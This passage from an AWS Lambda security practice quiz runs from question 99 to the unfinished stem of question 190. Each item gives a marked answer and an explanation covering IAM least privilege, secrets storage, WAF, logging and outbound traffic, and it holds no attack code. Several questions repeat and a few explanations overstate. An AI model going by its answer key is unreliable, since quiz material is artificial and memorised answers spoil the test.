C) It removes the need for IAM permissions
D) It eliminates the risk of DoS attacks

✅ Answer: A) It allows centralized dependency management and updates
📌 Explanation: Lambda layers help manage dependencies separately, ensuring easier updates and vulnerability fixes.

100. How can you limit the risk of unauthorized AWS Lambda invocations?

A) Restrict execution with IAM permissions and API Gateway authentication
B) Allow unrestricted public access to the function
C) Store AWS credentials inside the function code
D) Increase function timeout

✅ Answer: A) Restrict execution with IAM permissions and API Gateway authentication
📌 Explanation: IAM policies and API Gateway authentication ensure only authorized users or services can invoke the function.

101. What is a potential risk of storing unencrypted data in Amazon S3 for Lambda functions?

A) Data exposure if the S3 bucket is compromised
B) Lower function execution time
C) Reduced Lambda execution concurrency
D) Faster API response times

✅ Answer: A) Data exposure if the S3 bucket is compromised
📌 Explanation: Unencrypted data in S3 can be leaked if the bucket permissions are misconfigured or an attacker gains access.

102. How can AWS IAM role trust policies improve Lambda security?

A) By restricting which entities can assume the Lambda execution role
B) By increasing function concurrency
C) By reducing function execution time
D) By allowing all AWS accounts to assume the role

✅ Answer: A) By restricting which entities can assume the Lambda execution role
📌 Explanation: IAM role trust policies define which AWS accounts or services can assume a role, preventing unauthorized use.

103. How does using AWS Secrets Manager enhance Lambda security?

A) It securely stores and rotates secrets used in Lambda functions
B) It reduces function memory usage
C) It disables IAM permissions
D) It speeds up function execution

✅ Answer: A) It securely stores and rotates secrets used in Lambda functions
📌 Explanation: AWS Secrets Manager ensures sensitive data is stored securely and can be automatically rotated to minimize exposure risks.

104. What is the impact of excessive logging in AWS Lambda?

A) Increased CloudWatch costs and potential data leakage
B) Lower function execution time
C) Improved IAM security
D) Faster API response times

✅ Answer: A) Increased CloudWatch costs and potential data leakage
📌 Explanation: Over-logging can increase AWS costs and expose sensitive information if logs are not properly configured.

105. How can time-based authentication tokens improve Lambda security?

A) By preventing replay attacks
B) By reducing API Gateway request latency
C) By increasing function concurrency
D) By eliminating the need for IAM authentication

✅ Answer: A) By preventing replay attacks
📌 Explanation: Time-based authentication tokens (e.g., JWT with expiration times) ensure that requests cannot be reused maliciously.

106. What AWS feature can automatically rotate security credentials for Lambda functions?

A) AWS Secrets Manager
B) AWS CloudTrail
C) AWS Auto Scaling
D) AWS CloudFront

✅ Answer: A) AWS Secrets Manager
📌 Explanation: Secrets Manager helps securely store and automatically rotate sensitive credentials.

107. How does AWS X-Ray contribute to Lambda security?

A) By providing end-to-end request tracing to detect unusual activity
B) By reducing Lambda function execution costs
C) By encrypting Lambda function responses
D) By eliminating the need for IAM roles

✅ Answer: A) By providing end-to-end request tracing to detect unusual activity
📌 Explanation: AWS X-Ray helps trace requests, allowing detection of anomalies or security threats in Lambda execution.

108. What is the security risk of using broad IAM permissions in AWS Lambda?

A) Privilege escalation and unauthorized access
B) Reduced function execution time
C) Increased function memory allocation
D) Improved API performance

✅ Answer: A) Privilege escalation and unauthorized access
📌 Explanation: Broad IAM permissions allow attackers to access unintended AWS services or escalate privileges.

109. How can AWS Config help improve Lambda security?

A) By detecting non-compliant configurations and misconfigurations
B) By reducing function execution time
C) By allowing unrestricted API access
D) By disabling IAM authentication

✅ Answer: A) By detecting non-compliant configurations and misconfigurations
📌 Explanation: AWS Config monitors AWS Lambda configurations, ensuring best security practices are followed.

110. How can network ACLs enhance AWS Lambda security?

A) By blocking unauthorized inbound and outbound traffic
B) By increasing Lambda function speed
C) By improving API response times
D) By reducing IAM security requirements

✅ Answer: A) By blocking unauthorized inbound and outbound traffic
📌 Explanation: Network ACLs (NACLs) help control inbound and outbound traffic, preventing unauthorized access.

111. How can AWS Identity and Access Management (IAM) roles improve Lambda security?

A) By restricting access to AWS resources based on least privilege
B) By allowing unrestricted execution of all Lambda functions
C) By increasing function execution speed
D) By disabling logging to reduce security risks

✅ Answer: A) By restricting access to AWS resources based on least privilege
📌 Explanation: IAM roles should follow the least privilege principle, ensuring Lambda functions have only the permissions they need.

112. What is the primary security risk of using a default VPC for AWS Lambda?

A) It may expose Lambda functions to unauthorized outbound traffic
B) It increases Lambda function memory usage
C) It improves function execution latency
D) It allows IAM roles to be modified dynamically

✅ Answer: A) It may expose Lambda functions to unauthorized outbound traffic
📌 Explanation: A default VPC may lack strict security controls, allowing Lambda functions to connect to unauthorized external endpoints.

113. How can AWS Lambda be protected from unintended event triggers?

A) Use resource policies to limit allowed event sources
B) Disable IAM authentication
C) Increase the function timeout
D) Store AWS credentials inside function code

✅ Answer: A) Use resource policies to limit allowed event sources
📌 Explanation: Resource-based policies can restrict which AWS services or accounts are allowed to trigger Lambda functions.

114. What is the impact of failing to define maximum execution time for AWS Lambda?

A) Potential risk of Denial-of-Service (DoS) attacks
B) Faster API response time
C) Lower AWS billing costs
D) Increased IAM role security

✅ Answer: A) Potential risk of Denial-of-Service (DoS) attacks
📌 Explanation: Without execution time limits, Lambda functions can be abused for infinite loops or DoS attacks.

115. What is the best way to store sensitive credentials for use in AWS Lambda?

A) Use AWS Secrets Manager or AWS Systems Manager Parameter Store
B) Hardcode credentials in function environment variables
C) Store credentials in plaintext files inside the function code
D) Pass credentials via API query parameters

✅ Answer: A) Use AWS Secrets Manager or AWS Systems Manager Parameter Store
📌 Explanation: Secrets Manager and Parameter Store securely manage sensitive credentials without exposing them in code.

116. What risk does an open API Gateway endpoint connected to Lambda pose?

A) Increased exposure to unauthorized API abuse
B) Faster function execution time
C) Lower AWS billing costs
D) Improved response times

✅ Answer: A) Increased exposure to unauthorized API abuse
📌 Explanation: Open API Gateway endpoints allow attackers to send malicious requests, leading to DoS, brute force, or injection attacks.

117. How can an attacker exploit unvalidated input in an AWS Lambda function?

A) By injecting malicious payloads into event triggers
B) By reducing the function execution time
C) By increasing AWS storage usage
D) By modifying IAM permissions dynamically

✅ Answer: A) By injecting malicious payloads into event triggers
📌 Explanation: Without input validation, attackers can manipulate event data (from S3, SNS, API Gateway) to trigger unintended behaviors.

118. What is the recommended way to restrict outbound traffic from AWS Lambda?

A) Use VPC security groups and network ACLs
B) Allow all outbound traffic for flexibility
C) Store traffic rules in function logs
D) Increase function execution timeout

✅ Answer: A) Use VPC security groups and network ACLs
📌 Explanation: VPC security groups and network ACLs allow fine-grained control over which outbound connections are permitted.

119. What is a risk of granting AWS Lambda functions full access to DynamoDB?

A) The function may read or delete sensitive data unnecessarily
B) The function may execute faster than expected
C) AWS automatically restricts access dynamically
D) It reduces Lambda execution costs

✅ Answer: A) The function may read or delete sensitive data unnecessarily
📌 Explanation: Overly permissive IAM roles can allow a Lambda function to access and modify more data than necessary.

120. How does AWS Shield help protect Lambda applications?

A) It mitigates Distributed Denial-of-Service (DDoS) attacks
B) It increases function execution time
C) It automatically patches security vulnerabilities
D) It removes the need for IAM authentication

✅ Answer: A) It mitigates Distributed Denial-of-Service (DDoS) attacks
📌 Explanation: AWS Shield (Standard & Advanced) helps protect against DDoS attacks that can target API Gateway and Lambda functions.

121. What is a potential risk of allowing Lambda to connect to external databases?

A) The function may send sensitive data to unauthorized endpoints
B) AWS automatically encrypts external traffic
C) It improves database query speed
D) Lambda functions can scale faster

✅ Answer: A) The function may send sensitive data to unauthorized endpoints
📌 Explanation: Poorly configured connections can allow Lambda to leak sensitive data to external systems.

122. What AWS feature automatically revokes old security credentials?

A) AWS Secrets Manager
B) AWS CloudFront
C) AWS Auto Scaling
D) AWS X-Ray

✅ Answer: A) AWS Secrets Manager
📌 Explanation: AWS Secrets Manager supports automatic credential rotation, reducing security risks from stale credentials.

123. How can AWS WAF help protect Lambda functions?

A) By filtering malicious requests before they reach API Gateway
B) By increasing function execution concurrency
C) By disabling IAM authentication
D) By allowing unrestricted event triggers

✅ Answer: A) By filtering malicious requests before they reach API Gateway
📌 Explanation: AWS WAF blocks malicious requests, preventing SQL injection, XSS, and API abuse attacks.

124. How can time-based tokens (JWT, OAuth) improve Lambda security?

A) They prevent replay attacks and unauthorized access
B) They reduce function execution time
C) They allow unrestricted API access
D) They replace IAM permissions

✅ Answer: A) They prevent replay attacks and unauthorized access
📌 Explanation: Time-based authentication tokens ensure requests expire and cannot be reused for unauthorized access.

125. What is a risk of logging sensitive data in AWS Lambda?

A) Attackers may extract secrets from CloudWatch logs
B) Logs improve function execution speed
C) Lambda functions execute faster
D) AWS automatically encrypts all logs

✅ Answer: A) Attackers may extract secrets from CloudWatch logs
📌 Explanation: Sensitive data should never be logged, as logs can be accessed by unauthorized users if misconfigured.

126. What security measure should be taken when using Lambda@Edge?

A) Ensure IAM policies follow least privilege
B) Allow unrestricted global execution
C) Store all sensitive data inside function logs
D) Enable full public access for flexibility

✅ Answer: A) Ensure IAM policies follow least privilege
📌 Explanation: Lambda@Edge should only have necessary permissions to reduce the risk of privilege escalation and data leaks.

127. What is a potential risk of misconfigured VPC peering for AWS Lambda?

A) Unintended network exposure
B) Improved function execution time
C) Faster API Gateway responses
D) Lower AWS billing

✅ Answer: A) Unintended network exposure
📌 Explanation: Improper VPC peering can allow Lambda to communicate with unintended resources, leading to security risks.

128. What is the security risk of exposing AWS Lambda directly to the internet without an API Gateway?

A) Unauthorized users can invoke the function, leading to data exposure or misuse
B) The function execution time increases
C) AWS automatically blocks public invocations
D) IAM policies are disabled automatically

✅ Answer: A) Unauthorized users can invoke the function, leading to data exposure or misuse
📌 Explanation: Lambda functions should always be behind API Gateway, App Mesh, or another security layer to prevent direct invocation from external sources.

129. What is a best practice for securing inter-service communication between Lambda functions?

A) Use AWS IAM roles and signed authentication tokens
B) Allow unrestricted API access
C) Store access credentials in Lambda environment variables
D) Pass authentication details in plaintext HTTP headers

✅ Answer: A) Use AWS IAM roles and signed authentication tokens
📌 Explanation: IAM roles and signed tokens (JWT, OAuth) ensure that only authorized services communicate with Lambda functions.

130. How does AWS KMS (Key Management Service) help enhance security in Lambda?

A) Encrypts sensitive data before storing or processing it
B) Increases Lambda execution speed
C) Disables API Gateway logging
D) Reduces function concurrency

✅ Answer: A) Encrypts sensitive data before storing or processing it
📌 Explanation: AWS KMS ensures data is encrypted at rest and in transit, reducing the risk of unauthorized access.

131. Why is it important to set IAM conditions when granting Lambda permissions?

A) To restrict who, where, and when a Lambda function can be invoked
B) To improve function execution time
C) To reduce AWS billing costs
D) To allow all AWS accounts access

✅ Answer: A) To restrict who, where, and when a Lambda function can be invoked
📌 Explanation: IAM conditions help enforce access controls, limiting unwanted or malicious Lambda invocations.

132. What security risk can occur due to unrestricted Lambda Layer sharing?

A) Attackers can inject malicious code into a shared Lambda Layer
B) Lambda functions execute faster
C) API Gateway responses become slower
D) AWS automatically prevents unauthorized access

✅ Answer: A) Attackers can inject malicious code into a shared Lambda Layer
📌 Explanation: If Lambda Layers are publicly shared, attackers may insert malicious code that gets executed unknowingly.

133. How can AWS Config improve Lambda security?

A) Detects non-compliant security configurations and alerts users
B) Disables IAM policies
C) Increases function concurrency
D) Stores Lambda logs

✅ Answer: A) Detects non-compliant security configurations and alerts users
📌 Explanation: AWS Config continuously audits Lambda functions for misconfigurations, insecure IAM roles, and best practices violations.

134. What is a risk of allowing AWS Lambda to assume multiple IAM roles dynamically?

A) Potential privilege escalation if roles are not properly restricted
B) Lower AWS billing
C) Faster function execution
D) Increased API Gateway caching

✅ Answer: A) Potential privilege escalation if roles are not properly restricted
📌 Explanation: If Lambda is allowed to assume multiple roles, attackers could escalate privileges by switching to higher-permission roles.

135. How can AWS Lambda logs be protected from unauthorized access?

A) Restrict CloudWatch Logs access using IAM policies
B) Enable verbose logging for easier debugging
C) Store logs in plaintext S3 buckets
D) Disable logging completely

✅ Answer: A) Restrict CloudWatch Logs access using IAM policies
📌 Explanation: IAM policies should enforce access control over logs to prevent attackers from retrieving sensitive execution details.

136. What security risk does misconfigured API Gateway CORS settings pose?

A) Allows unauthorized cross-origin requests
B) Reduces function concurrency
C) Increases function execution latency
D) Reduces API Gateway costs

✅ Answer: A) Allows unauthorized cross-origin requests
📌 Explanation: Improper CORS settings can allow attackers to steal sensitive data by making requests from malicious origins.

137. What is a best practice to prevent unauthorized replay attacks on AWS Lambda?

A) Use time-based authentication tokens (e.g., JWT with expiration)
B) Allow all API Gateway requests
C) Store API keys in plaintext logs
D) Increase function execution timeout

✅ Answer: A) Use time-based authentication tokens (e.g., JWT with expiration)
📌 Explanation: Time-based authentication (e.g., OAuth, JWT expiry) prevents previously captured tokens from being reused.

138. Why should IAM roles for Lambda functions be tightly scoped?

A) To reduce attack surfaces and prevent privilege escalation
B) To speed up function execution
C) To enable unrestricted resource access
D) To increase logging verbosity

✅ Answer: A) To reduce attack surfaces and prevent privilege escalation
📌 Explanation: Broad IAM permissions make it easier for attackers to exploit excessive privileges.

139. What risk arises from allowing AWS Lambda to make unrestricted outbound network requests?

A) Data exfiltration to unauthorized external servers
B) Increased function execution time
C) Lower AWS billing
D) Faster API response times

✅ Answer: A) Data exfiltration to unauthorized external servers
📌 Explanation: If not restricted, an exploited Lambda function could send sensitive data to attacker-controlled endpoints.

140. How can AWS WAF help protect AWS Lambda functions?

A) By blocking malicious web requests before they reach API Gateway
B) By increasing function concurrency
C) By reducing Lambda execution time
D) By automatically encrypting responses

✅ Answer: A) By blocking malicious web requests before they reach API Gateway
📌 Explanation: AWS WAF filters out malicious traffic, preventing API abuse, SQL injection, and bot-based attacks.

141. What happens if an AWS Lambda function has no concurrency limits set?

A) It may experience excessive invocations, leading to denial-of-service (DoS) risks
B) It will execute faster
C) It will require fewer IAM permissions
D) AWS automatically blocks high invocation rates

✅ Answer: A) It may experience excessive invocations, leading to denial-of-service (DoS) risks
📌 Explanation: Without concurrency limits, Lambda functions can be spammed with invocations, consuming resources uncontrollably.

142. Why should AWS Lambda environment variables be encrypted?

A) To prevent credential exposure if logs are compromised
B) To increase function execution speed
C) To reduce API Gateway response latency
D) To allow unrestricted access

✅ Answer: A) To prevent credential exposure if logs are compromised
📌 Explanation: Environment variables can store sensitive data, which should be encrypted to prevent leaks.

143. What is a risk of allowing AWS Lambda to write directly to public S3 buckets?

A) Attackers could overwrite or exfiltrate sensitive data
B) Lambda functions will execute slower
C) API Gateway latency will increase
D) CloudWatch logs will not capture function activity

✅ Answer: A) Attackers could overwrite or exfiltrate sensitive data
📌 Explanation: Public S3 buckets allow unauthorized users to read or manipulate data if permissions are misconfigured.

144. What is the primary risk of deploying AWS Lambda functions with excessive IAM permissions?

A) Privilege escalation allowing attackers to access more resources than intended
B) Increased function execution time
C) Reduced function concurrency
D) AWS automatically revokes excessive permissions

✅ Answer: A) Privilege escalation allowing attackers to access more resources than intended
📌 Explanation: Overly permissive IAM roles can be exploited by attackers to access more AWS services or modify critical configurations.

145. How can an attacker exploit an AWS Lambda function that has access to a misconfigured S3 bucket?

A) By exfiltrating or modifying sensitive data stored in the bucket
B) By reducing Lambda function execution time
C) By triggering function cold starts
D) By increasing API Gateway latency

✅ Answer: A) By exfiltrating or modifying sensitive data stored in the bucket
📌 Explanation: If the Lambda function has full access to an insecure S3 bucket, attackers can read, modify, or delete stored data.

146. What is a recommended method to detect unauthorized access attempts on AWS Lambda functions?

A) Enable AWS CloudTrail logs for Lambda API calls
B) Increase Lambda execution memory
C) Disable IAM policies temporarily
D) Store logs inside the function environment variables

✅ Answer: A) Enable AWS CloudTrail logs for Lambda API calls
📌 Explanation: AWS CloudTrail logs track API activity, helping detect unauthorized access attempts and privilege escalation.

147. What happens if an AWS Lambda function allows unrestricted execution from any AWS principal?

A) Anyone in AWS can invoke the function, leading to security vulnerabilities
B) The function executes faster
C) AWS automatically limits the number of invocations
D) The function is blocked from running

✅ Answer: A) Anyone in AWS can invoke the function, leading to security vulnerabilities
📌 Explanation: If Lambda permissions are not properly scoped, external AWS accounts can invoke functions without restriction.

148. How does AWS Identity Federation improve AWS Lambda security?

A) By integrating external authentication providers (SAML, OAuth) to prevent unnecessary IAM role exposure
B) By increasing function execution time
C) By improving CloudWatch logging
D) By automatically blocking unauthorized users

✅ Answer: A) By integrating external authentication providers (SAML, OAuth) to prevent unnecessary IAM role exposure
📌 Explanation: AWS Identity Federation allows secure authentication using third-party identity providers instead of direct IAM credentials.

149. What is a security risk of not setting a timeout for an AWS Lambda function?

A) A malicious function could run indefinitely, leading to denial-of-service (DoS) risks
B) It improves function performance
C) It reduces AWS costs
D) It prevents unauthorized API Gateway access

✅ Answer: A) A malicious function could run indefinitely, leading to denial-of-service (DoS) risks
📌 Explanation: Without time limits, attackers could exploit Lambda functions to consume excessive AWS resources, causing DoS.

150. How can attackers abuse exposed AWS Lambda function URLs?

A) They can trigger unauthorized function executions and exploit vulnerabilities
B) They can reduce function execution latency
C) They can modify the function execution time
D) AWS automatically blocks external access

✅ Answer: A) They can trigger unauthorized function executions and exploit vulnerabilities
📌 Explanation: Exposed Lambda URLs allow attackers to invoke functions, potentially leading to DoS or unauthorized data access.

151. What is a key security concern when using Lambda to process user-generated file uploads?

A) Malicious file uploads leading to remote code execution (RCE)
B) Increased function execution latency
C) Reduced IAM role effectiveness
D) Reduced API Gateway efficiency

✅ Answer: A) Malicious file uploads leading to remote code execution (RCE)
📌 Explanation: Lambda functions handling file uploads should validate and sanitize input to prevent malicious payload execution.

152. What is a common security issue with event-driven Lambda execution?

A) Untrusted events triggering unintended function behaviors
B) Increased AWS billing
C) Reduced function execution time
D) API Gateway latency increases

✅ Answer: A) Untrusted events triggering unintended function behaviors
📌 Explanation: If event sources (e.g., SNS, S3, DynamoDB) are not properly secured, attackers can inject unexpected event payloads.

153. What should be avoided when logging errors in AWS Lambda?

A) Logging sensitive data such as API keys, passwords, or PII
B) Using structured logging for debugging
C) Implementing log retention policies
D) Enabling CloudWatch Logs

✅ Answer: A) Logging sensitive data such as API keys, passwords, or PII
📌 Explanation: Sensitive data should never be included in logs, as it can be exposed to unauthorized users.

154. How can AWS Lambda environment variables be secured?

A) Encrypt them using AWS KMS before storing
B) Store secrets as plaintext inside function code
C) Allow all AWS accounts to access environment variables
D) Disable encryption for faster execution

✅ Answer: A) Encrypt them using AWS KMS before storing
📌 Explanation: Environment variables should be encrypted using AWS KMS to prevent unauthorized access.

155. Why is it important to monitor Lambda function invocation patterns?

A) To detect unusual spikes that may indicate an attack (e.g., DoS, brute-force, or privilege escalation attempts)
B) To improve function execution speed
C) To increase AWS billing efficiency
D) To reduce function cold starts

✅ Answer: A) To detect unusual spikes that may indicate an attack (e.g., DoS, brute-force, or privilege escalation attempts)
📌 Explanation: Monitoring execution patterns helps identify security threats, unauthorized access, or misconfigurations.

156. What risk arises from allowing AWS Lambda functions to access unrestricted outbound network connections?

A) Data exfiltration by compromised functions
B) Reduced function execution time
C) Increased IAM security
D) AWS automatically blocks outbound traffic

✅ Answer: A) Data exfiltration by compromised functions
📌 Explanation: If an attacker exploits a Lambda function, unrestricted outbound access allows data to be sent to unauthorized destinations.

157. How can API Gateway protect AWS Lambda functions from brute-force attacks?

A) Enable rate limiting and request throttling
B) Allow all API requests without validation
C) Increase API Gateway execution timeout
D) Reduce function concurrency

✅ Answer: A) Enable rate limiting and request throttling
📌 Explanation: Rate limiting prevents attackers from repeatedly invoking functions to guess credentials or overwhelm resources.

**158. Why should AWS Lambda IAM roles avoid using `*` in permission policies?**

A) It grants excessive permissions, increasing security risks
B) It speeds up function execution
C) It reduces AWS billing costs
D) It improves API response times

✅ Answer: A) It grants excessive permissions, increasing security risks
📌 Explanation: Wildcard (*) permissions can expose functions to privilege escalation and unauthorized access.

159. What is the impact of insecure cross-account Lambda access?

A) Other AWS accounts can invoke functions without proper authorization
B) AWS automatically restricts all cross-account access
C) It reduces function execution speed
D) It improves API Gateway efficiency

✅ Answer: A) Other AWS accounts can invoke functions without proper authorization
📌 Explanation: Cross-account access should be strictly controlled using IAM and resource-based policies.

160. What is the best way to secure API Gateway endpoints connected to Lambda?

A) Use authentication mechanisms like IAM, JWT, OAuth, or API keys
B) Allow all users to access the API publicly
C) Store authentication data inside Lambda logs
D) Disable all security features for faster execution

✅ Answer: A) Use authentication mechanisms like IAM, JWT, OAuth, or API keys
📌 Explanation: API Gateway should enforce authentication to prevent unauthorized Lambda invocations.

161. What is the primary risk of using an AWS Lambda function with an overly permissive execution role?

A) The function could be exploited to access or modify unauthorized AWS resources
B) AWS automatically blocks excessive permissions
C) It increases Lambda cold start time
D) It improves function execution speed

✅ Answer: A) The function could be exploited to access or modify unauthorized AWS resources
📌 Explanation: Overly permissive IAM roles can be exploited by attackers to escalate privileges or access unauthorized AWS services.

162. What should you do to prevent event injection attacks in AWS Lambda?

A) Validate and sanitize all incoming event data
B) Allow unrestricted API Gateway triggers
C) Store events in plaintext logs
D) Enable debug mode for Lambda

✅ Answer: A) Validate and sanitize all incoming event data
📌 Explanation: Without proper validation, attackers can manipulate event triggers (e.g., SNS, S3, API Gateway) to inject malicious payloads.

163. How can AWS Lambda functions be protected against DDoS attacks?

A) Use AWS Shield and API Gateway rate limiting
B) Disable IAM authentication
C) Increase Lambda execution timeout
D) Allow unlimited public API access

✅ Answer: A) Use AWS Shield and API Gateway rate limiting
📌 Explanation: AWS Shield helps mitigate DDoS attacks, and API Gateway rate limiting restricts excessive function invocations.

164. What is the best way to handle AWS Lambda function failures securely?

A) Use Dead Letter Queues (DLQs) to capture failed event messages
B) Store failed event data in plaintext logs
C) Increase function execution timeout
D) Disable logging for failed events

✅ Answer: A) Use Dead Letter Queues (DLQs) to capture failed event messages
📌 Explanation: DLQs capture failed events for debugging and prevent infinite retry loops.

165. How can AWS Lambda functions be protected from privilege escalation attacks?

A) Follow the principle of least privilege for IAM roles
B) Use wildcard (*) permissions in IAM policies
C) Allow all AWS accounts to assume the execution role
D) Store AWS credentials in function logs

✅ Answer: A) Follow the principle of least privilege for IAM roles
📌 Explanation: Overly permissive IAM roles increase the risk of privilege escalation, where attackers gain unauthorized access to AWS services.

166. What is a security concern of using third-party libraries in AWS Lambda functions?

A) They may contain known vulnerabilities that attackers can exploit
B) They reduce function execution speed
C) They increase AWS billing
D) They automatically improve security

✅ Answer: A) They may contain known vulnerabilities that attackers can exploit
📌 Explanation: Unverified third-party libraries can introduce vulnerabilities, leading to remote code execution or data breaches.

167. Why should AWS Lambda logging be restricted to authorized users?

A) Logs may contain sensitive data that could be accessed by attackers
B) It improves function execution time
C) It reduces AWS costs
D) It increases function concurrency

✅ Answer: A) Logs may contain sensitive data that could be accessed by attackers
📌 Explanation: Unrestricted access to logs can expose secrets, API keys, or error messages that attackers can use for further exploitation.

168. How can IAM role assumption be abused in AWS Lambda security?

A) If a Lambda function assumes a highly privileged role, it may gain excessive permissions
B) It decreases Lambda function execution time
C) It increases function cold starts
D) It reduces AWS logging efficiency

✅ Answer: A) If a Lambda function assumes a highly privileged role, it may gain excessive permissions
📌 Explanation: Misconfigured IAM trust policies can allow Lambda to assume roles with unnecessary privileges, leading to security risks.

169. How can AWS CloudTrail improve AWS Lambda security?

A) By tracking API calls and detecting unauthorized access attempts
B) By reducing Lambda cold starts
C) By increasing Lambda execution speed
D) By automatically blocking insecure IAM policies

✅ Answer: A) By tracking API calls and detecting unauthorized access attempts
📌 Explanation: AWS CloudTrail logs API calls, helping to detect security incidents like unauthorized function modifications.

170. What is a key risk of using publicly available AWS Lambda Layers?

A) They could contain malicious code that executes within your Lambda function
B) They increase Lambda execution speed
C) AWS automatically verifies public layers for security
D) They improve API Gateway latency

✅ Answer: A) They could contain malicious code that executes within your Lambda function
📌 Explanation: Attackers could insert malicious code into publicly shared Lambda Layers, leading to function compromise.

171. What is a potential impact of storing API keys in Lambda environment variables without encryption?

A) An attacker who gains access to the function can extract the API keys
B) It improves function execution speed
C) It reduces AWS costs
D) AWS automatically encrypts all environment variables

✅ Answer: A) An attacker who gains access to the function can extract the API keys
📌 Explanation: Secrets should always be encrypted using AWS KMS to prevent exposure in case of a function compromise.

172. How can AWS Lambda functions be protected from race conditions?

A) Use DynamoDB conditional writes or distributed locking mechanisms
B) Allow all concurrent executions
C) Increase function timeout settings
D) Enable verbose logging

✅ Answer: A) Use DynamoDB conditional writes or distributed locking mechanisms
📌 Explanation: Race conditions can lead to data inconsistencies and security flaws; distributed locks ensure only one function modifies data at a time.

**173. What is the impact of using wildcard (`*`) permissions in an AWS Lambda function IAM role?**

A) It grants excessive permissions, increasing security risks
B) It improves function execution speed
C) It reduces AWS billing costs
D) It automatically secures the Lambda function

✅ Answer: A) It grants excessive permissions, increasing security risks
📌 Explanation: Using * in IAM policies allows Lambda functions to access more resources than required, violating the least privilege principle.

174. How can AWS Lambda functions be protected from misconfigured API Gateway permissions?

A) Use IAM authentication or JWT tokens to restrict API Gateway access
B) Allow all API requests without validation
C) Store authentication details in function logs
D) Disable API Gateway logging

✅ Answer: A) Use IAM authentication or JWT tokens to restrict API Gateway access
📌 Explanation: API Gateway should enforce authentication mechanisms to prevent unauthorized Lambda function invocations.

175. How does AWS WAF help protect AWS Lambda when integrated with API Gateway?

A) It filters out malicious traffic, including SQL injection and XSS attacks
B) It increases function concurrency
C) It reduces Lambda cold starts
D) It disables unauthorized function invocations

✅ Answer: A) It filters out malicious traffic, including SQL injection and XSS attacks
📌 Explanation: AWS WAF inspects API Gateway traffic and blocks malicious requests before they reach Lambda functions.

176. What security risk does an unsecured VPC endpoint for Lambda introduce?

A) It allows external attackers to send unauthorized requests to AWS services
B) It improves function execution speed
C) It increases AWS billing
D) AWS automatically blocks external VPC access

✅ Answer: A) It allows external attackers to send unauthorized requests to AWS services
📌 Explanation: An exposed VPC endpoint can be targeted by attackers to exfiltrate data or invoke unauthorized AWS services.

177. What is the primary risk of an AWS Lambda function having public execution permissions?

A) Anyone can invoke the function, leading to API abuse or data leakage
B) It reduces function execution time
C) AWS automatically restricts public access
D) It increases API Gateway request speed

✅ Answer: A) Anyone can invoke the function, leading to API abuse or data leakage
📌 Explanation: Lambda functions should always be secured with IAM policies and API Gateway authentication to prevent unauthorized invocations.

178. How can AWS Lambda functions be protected from unauthorized API Gateway calls?

A) Implement IAM authentication, API keys, or JWT-based authorization
B) Store access credentials in function logs
C) Allow unrestricted API calls for flexibility
D) Disable API Gateway logging

✅ Answer: A) Implement IAM authentication, API keys, or JWT-based authorization
📌 Explanation: Restricting API Gateway access prevents attackers from invoking Lambda functions without authorization.

179. What risk does unfiltered user input pose to AWS Lambda security?

A) It can lead to injection attacks such as SQLi or command injection
B) It improves function execution time
C) It allows users to execute Lambda functions faster
D) AWS automatically filters all input data

✅ Answer: A) It can lead to injection attacks such as SQLi or command injection
📌 Explanation: Unvalidated user input can be exploited to inject malicious commands, potentially compromising function execution.

180. What is the best approach for handling expired authentication tokens in AWS Lambda?

A) Reject expired tokens and prompt users to re-authenticate
B) Allow expired tokens for a grace period
C) Store expired tokens in function logs
D) Increase token expiration time indefinitely

✅ Answer: A) Reject expired tokens and prompt users to re-authenticate
📌 Explanation: Allowing expired tokens increases security risks; always enforce re-authentication for expired tokens.

181. How does AWS Secrets Manager enhance AWS Lambda security?

A) It securely stores and rotates sensitive credentials used by Lambda functions
B) It increases function execution time
C) It allows plaintext storage of credentials
D) It prevents Lambda function cold starts

✅ Answer: A) It securely stores and rotates sensitive credentials used by Lambda functions
📌 Explanation: AWS Secrets Manager helps prevent credential leaks by securely storing and automatically rotating access keys.

182. Why should AWS Lambda environment variables be encrypted?

A) To prevent credential exposure in case of a function compromise
B) To improve function execution speed
C) To reduce API Gateway latency
D) To allow unrestricted access

✅ Answer: A) To prevent credential exposure in case of a function compromise
📌 Explanation: Environment variables may contain sensitive data, which should always be encrypted to prevent unauthorized access.

183. What risk arises from using AWS Lambda with an unsecured DynamoDB table?

A) Attackers can access, modify, or delete database records without authorization
B) AWS automatically restricts database access
C) Function execution becomes slower
D) API Gateway requests are blocked

✅ Answer: A) Attackers can access, modify, or delete database records without authorization
📌 Explanation: Lambda functions should have restricted IAM permissions to DynamoDB to prevent unauthorized data access.

184. What should be done to prevent AWS Lambda from being exploited to send spam emails?

A) Restrict outbound email traffic using VPC security groups or SES policies
B) Increase Lambda execution timeout
C) Allow unrestricted access to email services
D) Disable logging for email functions

✅ Answer: A) Restrict outbound email traffic using VPC security groups or SES policies
📌 Explanation: Attackers may exploit compromised Lambda functions to send spam emails; outbound traffic should be restricted.

185. Why is it important to rotate IAM credentials used by AWS Lambda?

A) To reduce the risk of long-lived credentials being compromised
B) To improve function execution time
C) To increase API Gateway performance
D) To disable Lambda execution logs

✅ Answer: A) To reduce the risk of long-lived credentials being compromised
📌 Explanation: Rotating IAM credentials ensures that if they are compromised, they will only be valid for a short period.

186. How can AWS Lambda detect and block malicious payloads?

A) Use AWS WAF and input validation to filter malicious requests
B) Disable API Gateway logging
C) Increase Lambda function timeout
D) Store payloads in plaintext logs

✅ Answer: A) Use AWS WAF and input validation to filter malicious requests
📌 Explanation: AWS WAF can detect and block malicious payloads before they reach Lambda, reducing security risks.

187. What security measure should be enforced for Lambda functions processing personally identifiable information (PII)?**

A) Encrypt data at rest and in transit using AWS KMS
B) Allow public access to function logs
C) Store PII in plaintext inside function code
D) Increase function memory allocation

✅ Answer: A) Encrypt data at rest and in transit using AWS KMS
📌 Explanation: Sensitive data, such as PII, should always be encrypted to prevent unauthorized access.

188. What risk arises from allowing cross-account access to AWS Lambda functions?

A) External AWS accounts could invoke the function without proper authorization
B) AWS automatically blocks unauthorized access
C) Lambda execution time is reduced
D) API Gateway latency is improved

✅ Answer: A) External AWS accounts could invoke the function without proper authorization
📌 Explanation: Cross-account access should be explicitly defined to prevent unauthorized invocation of Lambda functions.

189. How can AWS Lambda logs be protected from unauthorized access?

A) Use IAM policies to restrict CloudWatch Logs access
B) Allow unrestricted access to logs
C) Store logs inside Lambda function environment variables
D) Disable logging for security reasons

✅ Answer: A) Use IAM policies to restrict CloudWatch Logs access
📌 Explanation: IAM policies should be used to enforce least privilege access for CloudWatch Logs, preventing sensitive data leaks.

190. What is the purpose of enabling AWS X-Ray for AWS Lambda functions?

